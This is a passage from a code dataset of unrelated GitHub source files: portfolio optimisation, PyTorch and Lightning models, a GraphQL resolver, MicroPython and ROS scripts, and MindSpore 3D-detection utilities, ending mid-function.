pd.DataFrame(columns=col_names)\n stocks_list = self.stocks\n for stock in stocks_list:\n df.loc[len(df.index)] = [stock.get_ticker(), stock.get_coefficient_in_period(), stock.get_roi_in_period()]\n return df\n\n def get_top_n_roi(self, n):\n df = self.get_cov_roi_for_all_stocks().sort_values(by=['ROI'], ascending=False).head(n)\n return df\n\n def get_correlation_FANNGS(self):\n self.df_daily_return.corr().plot(kind='bar')\n plt.show()\n\n def get_correlation_FANNGS_for_stock(self, ticker):\n self.df_daily_return.corr()[ticker].plot(kind='bar')\n plt.show()\n\n def get_Variance_for_stock(self, ticker):\n df = self.df_daily_return\n return df[ticker].var() * len(df)\n\n def get_covariance_of_stocks(self):\n df = self.df_daily_return\n return df.cov() * len(df)\n\n def plot_growth_of_investment(self):\n (self.df_adj_close / self.df_adj_close.iloc[0] * 100).plot(figsize=(16, 9))\n plt.show()\n\n def optimize_portfolio(self, number_combination):\n risk_free_rate = 0.0125 # years bound rate\n portfolio_returns = []\n portfolio_volatility = []\n portfolio_ratio = []\n portfolio_weights = []\n returns = np.log(self.df_adj_close / self.df_adj_close.shift(1))\n for x in range(number_combination):\n p_weights = np.random.random(len(self.stocks))\n p_weights /= np.sum(p_weights)\n\n ret = np.sum(p_weights * returns.mean()) * 252\n portfolio_returns.append(ret) # saving return\n\n vol = np.sqrt(np.dot(p_weights.T, np.dot(returns.cov() * 252, p_weights)))\n portfolio_volatility.append(vol) # saving volatility\n\n sr = (ret - risk_free_rate) / vol\n portfolio_ratio.append(sr) # saving sharpe ratio\n\n portfolio_weights.append(p_weights)\n\n portfolio_returns = np.array(portfolio_returns)\n portfolio_volatility = np.array(portfolio_volatility)\n portfolio_ratio = np.array(portfolio_ratio)\n portfolio_weights = np.array(portfolio_weights)\n\n SR_index = np.argmax(portfolio_ratio)\n\n for x in range(len(self.stocks)):\n print(\"Stocks: %s : %2.2f\" % (self.stocks[x].get_ticker(), (portfolio_weights[SR_index][x] * 100)))\n print(f\"Volatility = {portfolio_volatility[SR_index]}\")\n print(f\"Return = {portfolio_returns[SR_index]}\")\n\n def calculate_beta(self):\n \"\"\"\n Beta provides the relationship between an investment and the overall market. Risky investments tend to fall\n further during bad times, but will increase quicker during good times.\n\n Beta is found by dividing the covariance of the stock and the market by the variance of the overall market.\n It is a measure of systematic risk that can't be diversified away.\n\n B = 0 no relation to market\n B < 1 less risky than market\n B > 1 More risky than market\n \"\"\"\n for x in self.stocks:\n Tickers = [\"^GSPC\"]\n Tickers.append(x.get_ticker())\n ss = Stocks(Tickers,self.s.starting_year, self.s.starting_month, self.s.starting_day, self.s.ending_year,\n self.s.ending_month, self.s.ending_day)\n daily_df = ss.daily_return_for_all_stocks()\n cov = daily_df.cov() * 252\n cov_vs_market = cov.iloc[0,1]\n sp_var = daily_df['^GSPC'].var() * 252\n beta = cov_vs_market / sp_var\n print(f\"Stock : {x.get_ticker()} has a Beta = {beta}\")\n\n tickers = self.s.tickers_list\n tickers.append(\"^GSPC\")\n ss = Stocks(tickers, self.s.starting_year, self.s.starting_month, self.s.starting_day, self.s.ending_year,\n self.s.ending_month, self.s.ending_day)\n daily_df = ss.daily_return_for_all_stocks()\n cov = daily_df.cov() * 252\n cov_vs_market = cov.iloc[0, 1]\n sp_var = daily_df['^GSPC'].var() * 252\n beta = cov_vs_market / sp_var\n print(f\"Beta for whole portfolio : {beta}\")\n return beta\n\n def get_portfolio_roi_tot(self):\n df = self.df_adj_close\n\n for i in range(len(self.stocks)):\n tic = self.stocks[i].get_ticker()\n amount = int(input(f\"How many {tic} shares you want?\"))\n df[tic] = df[tic].apply(lambda x: x * amount)\n df[\"Total\"] = df.iloc[:,0:len(self.stocks)].sum(axis=1)\n start_value = df[\"Total\"].iloc[0]\n end_value = df[\"Total\"].iloc[-1]\n roi_tot = (end_value-start_value)/start_value\n return roi_tot\n\n def get_alhpa(self):\n risk_free_rate = 0.0125\n roi_tot = self.get_portfolio_roi_tot()\n sto = StockData(\"^GSPC\",self.s.starting_year, self.s.starting_month, self.s.starting_day, self.s.ending_year,\n self.s.ending_month, self.s.ending_day)\n sp_roi = sto.get_roi_in_period()\n print(f\"Portfolio ROI: {roi_tot}\")\n print(f\"S&P ROI: {sp_roi}\")\n p_alpha = roi_tot - risk_free_rate -(self.calculate_beta()*(sp_roi - risk_free_rate))\n print(f\"ALpha = {p_alpha}\")\n\n\n\n\n# ---------------------------------------------------------------------------------------------------------------\n\n# TEST CODE:\n\n# ---------------------------------------------------------------------------------------------------------------\n\n\n# tickers = [\"FB\", \"AAPL\", \"NFLX\", \"GOOG\", \"AMZN\", \"RIOT\"]\n# stocks = Stocks(tickers, 2020, 1, 2, 2020, 12, 31)\n# lri = LowRiskInvestment(stocks)\n# lri.get_correlation_FANNGS()\n# print(lri.get_Variance_for_stock(\"NFLX\"))\n# print(lri.get_covariance_of_stocks())\n\n# tickers = get_sector_tickers(\"Industrials\")\n# port_list = [\"GNRC\", \"DXCM\", \"AMD\", \"NFLX\", \"COST\", \"TGT\", \"AES\", \"MSCI\",\n# \"NEM\", \"SBAC\", \"HES\"]\n#port_list = [\"GOOG\",\"FB\"]\nport_list = [\"IDEX\",\"DSS\",\"PLTR\",\"URA\",\"NPK\",\"INTC\"]\nstocks = Stocks(port_list, 2021, 1, 1, 2021, 12, 31)\nlri = LowRiskInvestment(stocks)\nlri.get_correlation_FANNGS()\nprint(lri.get_top_n_roi(5))\nlri.plot_growth_of_investment()\nlri.optimize_portfolio(10000)\nlri.get_alhpa()\n\n#get Alpha for Tasi !!","repo_name":"a1234jehad/MyTraderApp","sub_path":"LowRiskInvestment.py","file_name":"LowRiskInvestment.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"94817563","text":"import torch\nfrom torch import nn\n\nclass CRNNEncoder(nn.Module):\n def __init__(self):\n super(CRNNEncoder, self).__init__()\n self.cnn = nn.Conv1d(\n in_channels=40, out_channels=64, kernel_size=20, padding=20//2\n )\n self.gru = nn.GRU(input_size=64, hidden_size=128)\n\n def forward(self, x, encoder_hidden):\n\n outputs = self.cnn(x)\n\n outputs = torch.transpose(outputs, 0, 2)\n outputs = torch.transpose(outputs, 1, 2)\n\n if encoder_hidden == None:\n outputs, hidden = self.gru(outputs)\n else:\n outputs, hidden = self.gru(outputs, encoder_hidden)\n\n outputs = torch.transpose(outputs, 0, 1)\n\n return outputs, hidden\n \nclass Attn(nn.Module):\n def __init__(self):\n super(Attn, self).__init__()\n self.main_fully_connected = nn.Linear(in_features=128, out_features=64)\n self.main_softmax = nn.Softmax(dim=-1)\n self.tanh = nn.Tanh()\n self.v = nn.Linear(64, 1)\n self.middle_softmax = nn.Softmax(dim=1)\n self.final_fully_connected = nn.Linear(in_features=128, out_features=2)\n self.final_softmax = nn.Softmax(dim=0)\n\n def forward(self, hiddens, single_input):\n\n x = self.main_fully_connected(hiddens)\n x = self.main_softmax(x)\n x = self.tanh(x)\n\n e = self.v(x)\n a = self.middle_softmax(e)\n\n outputs = []\n for i in range(hiddens.shape[0]):\n outputs.append(torch.mm(torch.transpose(hiddens[i], 0, 1), a[i]))\n outputs = torch.transpose(torch.cat(outputs, dim=1), 0, 1)\n\n outputs = self.final_fully_connected(outputs)\n\n if not single_input:\n outputs = self.final_softmax(outputs)\n\n return outputs\n\n\nclass KWS(nn.Module):\n def __init__(self):\n super(KWS, self).__init__()\n self.encoder = CRNNEncoder()\n self.attention = Attn()\n\n def forward(self, x, encoder_hidden = None, single_input = False):\n\n outputs, hidden = self.encoder(x, encoder_hidden)\n x = self.attention(outputs, single_input)\n\n return x, hidden\n ","repo_name":"MaxTheHuman/MyKWS","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8979411341","text":"import graphene\nfrom app.db import (\n db,\n Community as CommunityDB,\n Challenge as ChallengeDB,\n EntryEvent as EntryEventDB,\n Proposal as ProposalDB,\n Entry as EntryDB,\n Vote as VoteDB,\n VoteCommit,\n)\nfrom app.graphql.utils import (\n get_order_history,\n get_transfer_history,\n from_address_to_community,\n)\nfrom app.graphql import (\n user_balance as user_balance_module,\n transfer as transfer_module,\n order as order_module,\n vote as vote_module,\n proposal as proposal_module,\n reward as reward_module,\n challenge as challenge_module,\n entry as entry_module,\n)\n\n\nclass User(graphene.ObjectType):\n \"\"\" self = String representing the user's address \"\"\"\n\n class Meta:\n description = \"Represents an individual's Ethereum wallet that can interact with Band Protocol.\"\n\n address = graphene.String(\n required=True, description=\"The Ethereum address of this user.\"\n )\n\n balances = graphene.List(\n lambda: graphene.NonNull(user_balance_module.UserBalance),\n required=True,\n description=\"The list of token balances that this wallet has.\",\n filtered_by=graphene.Argument(\n lambda: user_balance_module.UserBalanceFilters\n ),\n )\n\n order_history = graphene.List(\n lambda: graphene.NonNull(order_module.Order),\n required=True,\n description=\"The list of all buy and sell orders conducted by this user to bonding curves.\",\n filtered_by=graphene.Argument(lambda: order_module.OrderFilters),\n )\n transfer_history = graphene.List(\n lambda: graphene.NonNull(transfer_module.Transfer),\n required=True,\n description=\"The list of all transfers sent from or received by this user.\",\n filtered_by=graphene.Argument(lambda: transfer_module.TransferFilters),\n )\n\n proposals = graphene.List(\n lambda: graphene.NonNull(proposal_module.Proposal),\n required=True,\n description=\"The list of all proposals proposed by this user.\",\n )\n\n votes = graphene.List(\n lambda: graphene.NonNull(vote_module.Vote),\n required=True,\n description=\"The list of all votes performed by this user.\",\n filtered_by=graphene.Argument(lambda: vote_module.VoteFilters),\n )\n\n tcr_entries = graphene.List(\n lambda: graphene.NonNull(entry_module.Entry),\n required=True,\n description=\"The list of all TCR entries proposed by this user.\",\n )\n\n tcr_challenges = graphene.List(\n lambda: graphene.NonNull(challenge_module.Challenge),\n required=True,\n description=\"The list of all TCR challenges initiated by this user.\",\n )\n\n tcr_rewards = graphene.List(\n lambda: graphene.NonNull(reward_module.Reward),\n required=True,\n description=\"The list of all TCR rewards owned by this user.\",\n )\n\n def resolve_address(self, info):\n return self\n\n def resolve_balances(self, info, filtered_by={}):\n if \"tokens\" in filtered_by:\n return [\n (self, comm)\n for comm in from_address_to_community(filtered_by[\"tokens\"])\n ]\n return [(self, comm) for comm in db.session.query(CommunityDB).all()]\n\n def resolve_order_history(self, info, filtered_by={}):\n if \"communities\" in filtered_by:\n filtered_by[\"communities\"] = from_address_to_community(\n filtered_by[\"communities\"]\n )\n return get_order_history(**filtered_by, users=[self])\n\n def resolve_transfer_history(self, info, filtered_by={}):\n if \"tokens\" in filtered_by:\n filtered_by[\"tokens\"] = from_address_to_community(\n filtered_by[\"tokens\"]\n )\n return get_transfer_history(**filtered_by, users=[self])\n\n def resolve_votes(self, info, filtered_by={}):\n if \"category\" in filtered_by and filtered_by[\"category\"] == \"cr\":\n return [\n (\n commit_vote,\n db.session.query(VoteDB)\n .filter_by(\n poll_id=commit_vote.poll_id, voter=commit_vote.voter\n )\n .first(),\n )\n for commit_vote in db.session.query(VoteCommit)\n .filter_by(voter=self)\n .all()\n ]\n\n return db.session.query(VoteDB).filter_by(voter=self).all()\n\n def resolve_proposals(self, info):\n return db.session.query(ProposalDB).filter_by(proposer=self).all()\n\n def resolve_tcr_rewards(self, info):\n return db.session.query(VoteDB).filter_by(voter=self).all()\n\n def resolve_tcr_challenges(self, info):\n return [\n (\n challenge_init,\n db.session.query(ChallengeDB)\n .filter_by(contract_id=challenge_init.contract_id)\n .filter_by(on_chain_id=challenge_init.on_chain_id)\n .filter(ChallengeDB.challenger == None)\n .first(),\n )\n for challenge_init in db.session.query(ChallengeDB)\n .filter_by(challenger=self)\n .all()\n ]\n\n def resolve_tcr_entries(self, info):\n entry_event_ids = [\n entry_event.entry.id\n for entry_event in db.session.query(EntryEventDB)\n .filter_by(actor=self)\n .all()\n ]\n return [\n (\n entry,\n db.session.query(EntryEventDB)\n .filter_by(entry_id=entry.id, action=\"SUBMITTED\")\n .order_by(EntryEventDB.id.desc())\n .first(),\n )\n for entry in db.session.query(EntryDB)\n .filter(EntryDB.id.in_(entry_event_ids))\n .all()\n ]\n","repo_name":"prin-r/tcrapi","sub_path":"app/graphql/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20488447222","text":"# teste de update\n\nfrom machine import I2C, Pin\nimport ssd1306\nimport json\nfrom time import sleep\n\ni2c = I2C(-1, Pin(5), Pin(4))\n\ndisplay = ssd1306.SSD1306_I2C(128, 64, i2c)\ndisplay.fill(0)\n\nfor i in range(100):\n \n if i % 2 == 0:\n display.text('{}'.format(i),0,0) # text, position x, position y\n display.show()\n display.fill(0)\n \n else:\n display.text('res > 0',0,0) # text, position x, position y\n display.show()\n display.fill(0)\n \n sleep(0.1)","repo_name":"bergpb/micropython_codes","sub_path":"testeUpdate.py","file_name":"testeUpdate.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43363706799","text":"#!/usr/bin/env python\nimport sys\nimport rospy\nfrom smart_movement.srv import *\nfrom std_msgs.msg import String\n\n\nclass handle_web_speed_status():\n def __init__(self):\n\n self.flag = False\n rospy.init_node('web_status_speed_server')\n \n # subscribe to the server topic \n rospy.Subscriber('/robot_status', String, self.callback)\n self.status_speed_pub = rospy.Publisher('/web_status_speed', String, queue_size=10)\n rospy.loginfo('Waiting for connection')\n rospy.loginfo(self.status_speed_pub.get_num_connections())\n # while (self.status_speed_pub.get_num_connections() == 0 ):\n # pass\n rospy.loginfo('waiting for the service')\n s = rospy.Service('web_status_speed_srv', RequestStatus, self.web_speed_status)\n \n rospy.spin()\n \n def web_speed_status(self, req):\n # publish the service coming from the web_server to the multithreaded-server\n rospy.loginfo(req.statusreq)\n self.status_speed_pub.publish(req.statusreq)\n rospy.loginfo('Waiting for the response')\n\n # while self.flag == False:\n # pass\n self.recieved = 'Motor:[1,1,1,1], Start:[1], Speed:[2], Emergency:[0,0,]'\n\n \n self.flag = True\n #send the info back to the web server \n return RequestStatusResponse(self.recieved)\n \n def callback(self, data):\n rospy.loginfo(\"updated\")\n self.flag = True \n self.recieved = data.data \n rospy.loginfo(self.recieved)\n\n# def web_status_speed_server():\n# rospy.init_node('web_status_speed_server')\n# # subscribe to the server topic \n# status_speed_pub = rospy.Publisher('/web_status_speed', String, queue_size=10)\n# while (status_speed_pub.get_num_connections() == 0):\n# rospy.loginfo(\"waiting for subscriber\")\n \n# s = rospy.Service('web_status_speed', RequestStatus, handle_web_speed_status)\n# rospy.spin()\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n try:\n handle_web_speed_status()\n \n except rospy.ROSInitException:\n rospy.loginfo(\"Terminated\")\n pass","repo_name":"fontyssmartwrist/backup","sub_path":"smart_movement/src/test_web_server.py","file_name":"test_web_server.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21744408308","text":"import random\nprint('This contents makeface function') # 추가한 부분\na = 5 # 추가한 부분\n\ndef makeFace():\n face = ['(x_x)', '(O_O)', '(-_-#)', '(>_<)', '(^o^)', '=^Y^=', '(`_^)',\n 'd-_-b', 'p(^o^)q']\n numFace = len(face)\n index = random.randint(0, numFace - 1)\n return face[index]\n \nprint(makeFace()) \n","repo_name":"gilbutITbook/007013","sub_path":"chap3/sample_function_01_추가버전.py","file_name":"sample_function_01_추가버전.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"39896651955","text":"import base64\nfrom StringIO import StringIO\n\nfrom PIL import Image\n\nfrom pypln.backend.workers import WordCloud\nfrom utils import TaskTest\n\n\nclass TestFreqDistWorker(TaskTest):\n name = \"WordCloud\"\n def test_wordcloud_should_return_a_base64_encoded_png(self):\n doc = {'freqdist': [('is', 2), ('the', 2), ('blue', 1), ('sun', 1),\n ('sky', 1), (',', 1), ('yellow', 1), ('.', 1)], 'language': 'en'}\n doc_id = self.collection.insert(doc, w=1)\n WordCloud().delay(doc_id)\n\n refreshed_document = self.collection.find_one({'_id': doc_id})\n raw_png_data = base64.b64decode(refreshed_document['wordcloud'])\n\n fake_file = StringIO(raw_png_data)\n img = Image.open(fake_file)\n img.verify()\n self.assertEqual(img.format, 'PNG')\n","repo_name":"NAMD/pypln.backend","sub_path":"tests/test_worker_wordcloud.py","file_name":"test_worker_wordcloud.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"18"} +{"seq_id":"21333693731","text":"import torch\nimport random\nfrom torch import optim\nimport pytorch_lightning as pl\n\nfrom typing import Any, List, Optional, Tuple\nfrom pytorch_lightning.utilities.types import STEP_OUTPUT\n\nfrom src.models.components.decoder_attn_rnn import AttnDecoderRNN\nfrom src.models.components.encoder_rnn import EncoderRNN\n\n\nclass MessageEventEncoderLitModule(pl.LightningModule):\n def __init__(\n self,\n vector_size,\n hidden_size,\n max_length,\n START,\n END,\n optimizer: optim.Optimizer,\n tf_rate: float = 0.8,\n nucleus_p: float = 0.9,\n ):\n super().__init__()\n self.input_size = self.output_size = vector_size\n self.hidden_size = hidden_size\n self.max_length = max_length\n self.START = START\n self.END = END\n self.tf_rate = tf_rate\n self.nucleus_p = nucleus_p\n\n self.optimizer = optimizer\n self.encoder = EncoderRNN(self.input_size, self.hidden_size)\n self.decoder = AttnDecoderRNN(\n self.hidden_size, self.output_size, max_length=self.max_length\n )\n self.metric = torch.nn.NLLLoss()\n self.save_hyperparameters()\n\n def encode(self, input) -> torch.Tensor:\n input_tensor = input\n encoder_hidden = self.encoder.initHidden()\n input_length = input_tensor.size(0)\n encoder_outputs = torch.zeros(\n self.max_length, self.encoder.hidden_size, dtype=torch.float\n )\n for ei in range(input_length):\n encoder_output, encoder_hidden = self.encoder(\n input_tensor[ei], encoder_hidden\n )\n encoder_outputs[ei] = encoder_output[0, 0]\n\n return encoder_outputs\n\n def decode(\n self, input, target: Optional[torch.Tensor] = None\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n decoder_input = self.START\n decoder_hidden = self.decoder.initHidden()\n decoder_outputs = list()\n\n loss = torch.tensor(0, dtype=torch.float)\n count = 0\n for di in range(self.max_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, input\n )\n _, top_i = decoder_output.topk(1)\n decoder_input = top_i.squeeze()\n\n if target is not None:\n target_i = (\n target[di] if di < target.size(0) else torch.tensor([self.END])\n )\n loss += self.metric(decoder_output, target_i)\n\n decoder_outputs.append(top_i.item())\n count += 1\n if top_i.item() == self.END:\n break\n\n if target is not None:\n loss = loss / count\n return torch.tensor(decoder_outputs), loss\n\n def forward(self, input) -> Tuple[List, torch.Tensor, torch.Tensor, List]:\n assert input.size(0) == 1, \"batch has to be of size 1\"\n input_tensor = input[0]\n\n encoder_hidden = self.encoder.initHidden()\n input_length = input_tensor.size(0)\n encoder_outputs = torch.zeros(\n self.max_length, self.encoder.hidden_size, dtype=torch.float\n )\n loss = torch.tensor(0, dtype=torch.float)\n for ei in range(input_length):\n encoder_output, encoder_hidden = self.encoder(\n input_tensor[ei], encoder_hidden\n )\n encoder_outputs[ei] = encoder_output[0, 0]\n\n decoder_input = self.START\n decoder_hidden = self.decoder.initHidden()\n decoder_outputs = list()\n probabilities = list()\n\n count = 0\n for di in range(self.max_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n dist = torch.exp(decoder_output).view(-1)\n dist_sorted, dist_i = dist.sort(descending=True)\n\n nucleus = torch.cumsum(dist_sorted, dim=0) < self.nucleus_p\n nucleus = torch.cat(\n [nucleus.new_ones(nucleus.shape[:-1] + (1,)), nucleus[..., :-1]], dim=-1\n )\n candidates = dist_i[nucleus]\n probabilities.append((dist_sorted[nucleus], candidates))\n\n target = (\n input_tensor[di]\n if di < input_tensor.size(0)\n else torch.tensor([self.END])\n )\n decoder_input = target\n\n loss += self.metric(decoder_output, target)\n\n if target in candidates:\n step_output = target.item()\n else:\n step_output = candidates[0].item()\n\n decoder_outputs.append(step_output)\n count += 1\n if step_output == self.END:\n break\n\n assert count != 0, \"count can not be 0\"\n loss = loss / count\n return decoder_outputs, loss, encoder_outputs, probabilities\n\n def training_step(self, batch, batch_idx) -> STEP_OUTPUT:\n input_tensor = batch\n assert input_tensor.size(0) == 1, \"batch has to be of size 1\"\n input_tensor = input_tensor[0]\n target_tensor = input_tensor\n\n encoder_hidden = self.encoder.initHidden()\n input_length = input_tensor.size(0)\n encoder_outputs = torch.zeros(\n self.max_length, self.encoder.hidden_size, dtype=torch.float\n )\n loss = torch.tensor(0, dtype=torch.float)\n for ei in range(input_length):\n encoder_output, encoder_hidden = self.encoder(\n input_tensor[ei], encoder_hidden\n )\n encoder_outputs[ei] = encoder_output[0, 0]\n\n decoder_input = self.START\n decoder_hidden = self.decoder.initHidden()\n\n teacher_forcing = random.random() < self.tf_rate\n count = 0\n if teacher_forcing:\n for di in range(input_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n loss += self.metric(decoder_output, target_tensor[di])\n decoder_input = target_tensor[di]\n count += 1\n else:\n for di in range(input_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n _, top_i = decoder_output.topk(1)\n decoder_input = top_i.squeeze().detach()\n\n loss += self.metric(decoder_output, target_tensor[di])\n count += 1\n if decoder_input.item() == self.END:\n break\n\n assert count != 0, \"count can not be 0\"\n loss = loss / count\n self.log(\"train_loss\", loss)\n return loss\n\n def test_step(self, batch, batch_idx) -> None:\n input_tensor = batch\n _, loss, *_ = self.forward(input_tensor)\n self.log(\"test_loss\", loss)\n\n def validation_step(self, batch, batch_idx) -> Optional[STEP_OUTPUT]:\n _, loss, *_ = self.forward(batch)\n self.log(\"val_loss\", loss)\n\n def predict_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> Any:\n input_tensor = batch\n decoder_outputs, loss, *_ = self.forward(input_tensor)\n return (decoder_outputs, input_tensor.squeeze().tolist(), loss)\n\n def configure_optimizers(self):\n return self.optimizer(self.parameters()) # type: ignore\n","repo_name":"nico-ru/BAnDIT","sub_path":"src/models/message_event_encoder.py","file_name":"message_event_encoder.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24636814673","text":"import csv\nimport os\nfrom collections import defaultdict\nfrom collections import deque\n\nimport numpy\nimport numpy as np\nfrom mindspore import Tensor, ops, nn\nimport mindspore as ms\nfrom shapely import Polygon\n\n\nclass SmoothedValue():\n \"\"\"Track a series of values and provide access to smoothed values over a\n window or the global series average.\n \"\"\"\n\n def __init__(self, window_size=10):\n self.deque = deque(maxlen=window_size)\n self.series = []\n self.total = 0.0\n self.count = 0\n\n def update(self, value):\n self.deque.append(value)\n self.series.append(value)\n self.count += 1\n self.total += value\n\n @property\n def value(self):\n d = Tensor(list(self.deque))\n return d[-1].item()\n\n @property\n def median(self):\n d = Tensor(list(self.deque))\n return d.median().item()\n\n @property\n def avg(self):\n d = Tensor(list(self.deque))\n return d.mean().asnumpy()\n\n @property\n def global_avg(self):\n return self.total / self.count\n\n\nclass MetricLogger():\n def __init__(self, delimiter=\"\\t\"):\n self.meters = defaultdict(SmoothedValue)\n self.delimiter = delimiter\n\n def update(self, **kwargs):\n for k, v in kwargs.items():\n if isinstance(v, Tensor) or isinstance(v, numpy.ndarray):\n v = v.item()\n assert isinstance(v, (float, int))\n self.meters[k].update(v)\n\n def __getattr__(self, attr):\n if attr in self.meters:\n return self.meters[attr]\n if attr in self.__dict__:\n return self.__dict__[attr]\n raise AttributeError(\"{} object has no attribute {}\".format(\n type(self).__name__, attr))\n\n def __str__(self):\n loss_str = []\n for name, meter in self.meters.items():\n # loss_str.append(\n # \"{}: {:.4f} ({:.4f})\".format(name, meter.median, meter.global_avg)\n # )\n loss_str.append(\n \"{}: {:.4f}\".format(name, meter.avg)\n )\n return self.delimiter.join(loss_str)\n\n\ndef get_device_id():\n device_id = os.getenv('DEVICE_ID', '0')\n return int(device_id)\n\n\nclass AllReduce(nn.Cell):\n def __init__(self):\n super(AllReduce, self).__init__()\n self.all_reduce = ops.AllReduce()\n\n def construct(self, x):\n return self.all_reduce(x)\n\n\ndef nms_hm(heat_map, kernel=3, reso=1):\n kernel = int(kernel / reso)\n if kernel % 2 == 0:\n kernel += 1\n\n pad = (kernel - 1) // 2\n maxpool2d = nn.MaxPool2d(kernel_size=kernel, stride=1, pad_mode='pad', padding=pad)\n hmax = maxpool2d(heat_map)\n\n eq_index = (hmax == heat_map)\n\n return heat_map * eq_index\n\n\ndef get_iou_3d(pred_corners, target_corners):\n \"\"\"\n :param corners3d: (N, 8, 3) in rect coords\n :param query_corners3d: (N, 8, 3)\n :return: IoU\n \"\"\"\n min = ops.Minimum()\n max = ops.Maximum()\n zeros=ops.Zeros()\n\n A, B = pred_corners, target_corners\n N = A.shape[0]\n\n # init output\n iou3d = zeros((N,),ms.float32)\n\n # for height overlap, since y face down, use the negative y\n min_h_a = - A[:, 0:4, 1].sum(axis=1) / 4.0\n max_h_a = - A[:, 4:8, 1].sum(axis=1) / 4.0\n min_h_b = - B[:, 0:4, 1].sum(axis=1) / 4.0\n max_h_b = - B[:, 4:8, 1].sum(axis=1) / 4.0\n\n # overlap in height\n h_max_of_min = max(min_h_a, min_h_b)\n h_min_of_max = min(max_h_a, max_h_b)\n h_overlap = max(zeros(h_min_of_max.shape,ms.float32),h_min_of_max - h_max_of_min)\n\n # x-z plane overlap\n for i in range(N):\n bottom_a, bottom_b = Polygon(ops.transpose(A[i, 0:4, [0, 2]],(1,0))), Polygon(ops.transpose(B[i, 0:4, [0, 2]],(1,0)))\n\n if bottom_a.is_valid and bottom_b.is_valid:\n # check is valid, A valid Polygon may not possess any overlapping exterior or interior rings.\n bottom_overlap = bottom_a.intersection(bottom_b).area\n else:\n bottom_overlap =0\n\n overlap3d = bottom_overlap * h_overlap[i]\n union3d = bottom_a.area * (max_h_a[i] - min_h_a[i]) + bottom_b.area * (max_h_b[i] - min_h_b[i]) - overlap3d\n\n iou3d[i] = overlap3d / union3d\n\n return iou3d\n\n\ndef select_topk(heat_map, K=100):\n '''\n Args:\n heat_map: heat_map in [N, C, H, W]\n K: top k samples to be selected\n score: detection threshold\n\n Returns:\n\n '''\n batch, cls, height, width = heat_map.shape\n\n # First select topk scores in all classes and batchs\n # [N, C, H, W] -----> [N, C, H*W]\n heat_map = heat_map.view(batch, cls, -1)\n # Both in [N, C, K]\n topk_scores_all, topk_inds_all = ops.topk(heat_map, K)\n\n # topk_inds_all = topk_inds_all % (height * width) # todo: this seems redudant\n topk_ys = ops.cast(topk_inds_all / width,ms.float32)\n topk_xs = ops.cast(topk_inds_all % width,ms.float32)\n\n # assert isinstance(topk_xs, ops.cuda.FloatTensor)\n # assert isinstance(topk_ys, ops.cuda.FloatTensor)\n\n # Select topK examples across channel (classes)\n # [N, C, K] -----> [N, C*K]\n topk_scores_all = topk_scores_all.view(batch, -1)\n # Both in [N, K]\n topk_scores, topk_inds = ops.topk(topk_scores_all, K)\n topk_clses = ops.cast(topk_inds / K,ms.float32)\n\n # assert isinstance(topk_clses, ops.cuda.FloatTensor)\n\n # First expand it as 3 dimension\n topk_inds_all = _gather_feat(topk_inds_all.view(batch, -1, 1), topk_inds).view(batch, K)\n topk_ys = _gather_feat(topk_ys.view(batch, -1, 1), topk_inds).view(batch, K)\n topk_xs = _gather_feat(topk_xs.view(batch, -1, 1), topk_inds).view(batch, K)\n\n return topk_scores, topk_inds_all, topk_clses, topk_ys, topk_xs\n\n\ndef _gather_feat(feat, ind):\n '''\n Select specific indexs on feature map\n Args:\n feat: all results in 3 dimensions\n ind: positive index\n\n Returns:\n\n '''\n channel = feat.shape[-1]\n size=ms.Tensor(np.array([ind.shape[0], ind.shape[1], channel]),ms.int32)\n ind=ops.expand_dims(ind,-1).expand(size)\n feat = feat.gather_elements(1, ind)\n\n return feat\n\n\ndef get_iou3d(pred_bboxes, target_bboxes):\n num_query = target_bboxes.shape[0]\n\n # compute overlap along y axis\n min_h_a = - (pred_bboxes[:, 1] + pred_bboxes[:, 4] / 2)\n max_h_a = - (pred_bboxes[:, 1] - pred_bboxes[:, 4] / 2)\n min_h_b = - (target_bboxes[:, 1] + target_bboxes[:, 4] / 2)\n max_h_b = - (target_bboxes[:, 1] - target_bboxes[:, 4] / 2)\n\n # overlap in height\n h_max_of_min = ops.max(min_h_a, min_h_b)\n h_min_of_max = ops.min(max_h_a, max_h_b)\n h_overlap = (h_min_of_max - h_max_of_min).clamp_(min=0)\n\n # volumes of bboxes\n pred_volumes = pred_bboxes[:, 3] * pred_bboxes[:, 4] * pred_bboxes[:, 5]\n target_volumes = target_bboxes[:, 3] * target_bboxes[:, 4] * target_bboxes[:, 5]\n\n # derive x y l w alpha\n pred_bboxes = pred_bboxes[:, [0, 2, 3, 5, 6]]\n target_bboxes = target_bboxes[:, [0, 2, 3, 5, 6]]\n\n # convert bboxes to corners\n pred_corners = get_corners(pred_bboxes)\n target_corners = get_corners(target_bboxes)\n iou_3d = pred_bboxes.new_zeros(num_query)\n\n for i in range(num_query):\n ref_polygon = Polygon(pred_corners[i])\n target_polygon = Polygon(target_corners[i])\n overlap = 